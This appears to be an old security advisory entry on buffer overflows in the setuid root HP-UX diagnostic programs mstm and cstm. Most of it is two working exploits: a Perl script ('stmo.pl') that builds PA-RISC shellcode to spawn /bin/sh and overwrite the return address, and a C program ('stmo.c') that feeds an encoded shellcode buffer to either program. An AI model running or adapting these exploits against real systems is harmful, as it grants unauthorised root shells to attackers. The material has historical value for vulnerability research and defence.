COMMAND

    usr/diag/bin/mstm, usr/diag/bin/cstm

SYSTEMS AFFECTED

    HP 9.X, 10.X?

PROBLEM

    The following scripts show  buffer-overruns and it buggers  up two
    very  similar  setuid  root  programs  in  /usr/diag/bin, mstm and
    cstm.  One is perl and another is C.

    --- stmo.pl ---
    #!/usr/bin/perl

    # working exlpoit for 9.X setuid root /usr/diag/bin/[cm]stm

    use FileHandle;

    sub h2cs {
      local($stuff)=@_;
      local($rv);
          while($stuff !~ /^$/) {
            $bob=$stuff;
            $bob =~ s/^(..).*$/$1/;
            $stuff =~ s/^..//;
            $rv.=chr(oct("0x${bob}"));
          }
      return $rv;
      }

    $code="AA"; # two byte alignment

    $code.=h2cs("34010102"); # ldi 129,r1
    $code.=h2cs("08220401"); # sub rp,r1,r1
    $code.=h2cs("602002a6"); # stb r0,339(r1)
    #$code.=h2cs("602002ac"); # stb r0,342(r1)
    $code.=h2cs("b43a0298"); # addi 332,r1,arg0
    $code.=h2cs("34160176"); # ldi 187,r22
    $code.=h2cs("34010276"); # ldi 315,r1
    $code.=h2cs("08360216"); # and r22,r1,r22
    $code.=h2cs("20200801"); # ldil l%c0000004,r1
    $code.=h2cs("e420e008"); # ble 4(sr7,r1)
    $code.=h2cs("08210280"); # NOP == xor r1,r1,r0
    #$code.=h2cs("deadcafe"); # illegal instruction
    $num=208-length($code);
    $code.="C"x$num;

    $data="/bin/sh.sh.";
    $num=16-length($data);
    $data.="D"x$num;

    $num=224-length($of);
    $of=$code.$data;
    $of.=h2cs("7b03301B");
    print "Length is: ",length($of),"\n";
    exec("/usr/diag/bin/mstm","-l","$of");

    --- stmo.c ---
    /* SOD /usr/diag/bin/[cm]stm buffer overflow */

    main()
    {
    char buf[500];

strcpy(buf,"\x41\x41\x34\x01\x01\x02\x08\x22\x04\x01\x60\x20\x02\xa6\x60\x20\x02\xac\xb4\x3a\x02\x98\x34\x16\x01\x76\x34\x01\x02\x76\x08\x36\x02\x16\x08\x21\x02\x80\x20\x20\x08\x01\xe4\x20\xe0\x08\x08\x21\x02\x80\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x4
3\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x
43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\
x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x69\x2e\x44\x44\x44\x44\x44\x7b\x03\x30\x1b");

    execl("/usr/diag/bin/mstm","/usr/diag/bin/mstm","-l",buf,(char *)0);
    /* Either-or, same overflow */
    execl("/usr/diag/bin/cstm","/usr/diag/bin/cstm","-l",buf,(char *)0);
    }